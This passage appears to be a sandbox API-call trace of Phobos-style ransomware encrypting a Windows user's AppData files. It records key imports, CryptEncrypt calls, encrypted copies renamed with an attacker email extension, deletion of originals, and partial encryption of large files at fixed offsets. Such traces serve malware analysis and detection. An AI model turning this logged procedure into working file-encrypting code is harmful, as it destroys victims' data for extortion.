lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x77b3, lpOverlapped=0x0) returned 1 [0190.849] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x77c0, dwBufLen=0x77c0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x77c0) returned 1 [0190.850] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x77c0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x77c0, lpOverlapped=0x0) returned 1 [0190.851] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0190.851] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.851] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0190.851] CryptDestroyKey (hKey=0xa32be8) returned 1 [0190.851] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0190.851] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.851] CloseHandle (hObject=0x194) returned 1 [0190.851] CloseHandle (hObject=0x178) returned 1 [0190.851] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\latest[3].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\latest[3].eot")) returned 1 [0190.852] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0190.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Themes\\Custom.theme" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\themes\\custom.theme"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.853] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1802) returned 1 [0190.853] CloseHandle (hObject=0x178) returned 1 [0190.853] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Themes\\Custom.theme" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\themes\\custom.theme")) returned 0x2020 [0190.853] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Themes\\Custom.theme.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\themes\\custom.theme.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Themes\\Custom.theme" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\themes\\custom.theme"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.853] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.853] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Themes\\Custom.theme.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\themes\\custom.theme.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.854] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0190.854] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.854] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x70a, lpOverlapped=0x0) returned 1 [0190.866] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x710, dwBufLen=0x710 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x710) returned 1 [0190.866] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x710, lpOverlapped=0x0) returned 1 [0190.867] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0190.867] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.867] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0190.867] CryptDestroyKey (hKey=0xa327e8) returned 1 [0190.867] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0190.867] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.867] CloseHandle (hObject=0x178) returned 1 [0190.867] CloseHandle (hObject=0x194) returned 1 [0190.867] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Themes\\Custom.theme" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\themes\\custom.theme")) returned 1 [0190.868] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0190.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.869] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=672) returned 1 [0190.869] CloseHandle (hObject=0x194) returned 1 [0190.869] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount")) returned 0x2020 [0190.869] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.869] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.869] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.869] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0190.869] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.869] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x2a0, lpOverlapped=0x0) returned 1 [0190.885] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2b0, dwBufLen=0x2b0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2b0) returned 1 [0190.885] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x2b0, lpOverlapped=0x0) returned 1 [0190.886] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d28) returned 1 [0190.886] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.886] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0190.886] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.886] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x142, lpOverlapped=0x0) returned 1 [0190.886] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.886] CloseHandle (hObject=0x194) returned 1 [0190.886] CloseHandle (hObject=0x178) returned 1 [0191.465] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount")) returned 1 [0191.468] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0191.468] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.msmessagestore"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0191.469] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2121728) returned 1 [0191.469] CloseHandle (hObject=0x12c) returned 1 [0191.469] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.msmessagestore")) returned 0x2020 [0191.469] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.msmessagestore"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.msmessagestore.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0191.470] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.msmessagestore.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0191.471] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0191.471] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0191.471] ReadFile (in: hFile=0x12c, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0191.555] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0xacaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0191.555] ReadFile (in: hFile=0x12c, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0191.684] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x1c6000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0191.684] ReadFile (in: hFile=0x12c, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0191.824] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32a68) returned 1 [0191.824] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0191.824] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0070, dwBufLen=0xc0070 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0070) returned 1 [0191.830] CryptDestroyKey (hKey=0xa32a68) returned 1 [0191.830] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0191.830] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0122, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0122, lpOverlapped=0x0) returned 1 [0191.840] SetEndOfFile (hFile=0x12c) returned 1 [0191.841] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x1c6000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0191.841] WriteFile (in: hFile=0x12c, lpBuffer=0x301015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301015a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0191.849] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0xacaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0191.849] WriteFile (in: hFile=0x12c, lpBuffer=0x301015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301015a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0191.851] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0191.852] WriteFile (in: hFile=0x12c, lpBuffer=0x301015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301015a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0191.853] CloseHandle (hObject=0x12c) returned 1 [0191.853] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0191.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0191.854] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2097152) returned 1 [0191.854] CloseHandle (hObject=0x12c) returned 1 [0191.854] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs")) returned 0x2020 [0191.854] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0191.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0191.855] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0191.855] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0191.855] ReadFile (in: hFile=0x12c, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0192.423] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0192.423] ReadFile (in: hFile=0x12c, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0192.516] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0192.517] ReadFile (in: hFile=0x12c, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0192.567] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32d28) returned 1 [0192.567] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0192.567] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0192.573] CryptDestroyKey (hKey=0xa32d28) returned 1 [0192.573] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0192.574] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0192.594] SetEndOfFile (hFile=0x12c) returned 1 [0192.594] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0192.594] WriteFile (in: hFile=0x12c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0192.596] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0192.596] WriteFile (in: hFile=0x12c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0192.598] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0192.598] WriteFile (in: hFile=0x12c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0192.599] CloseHandle (hObject=0x12c) returned 1 [0192.599] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0192.600] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0192.600] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0192.600] CloseHandle (hObject=0x12c) returned 1 [0192.600] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0192.600] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 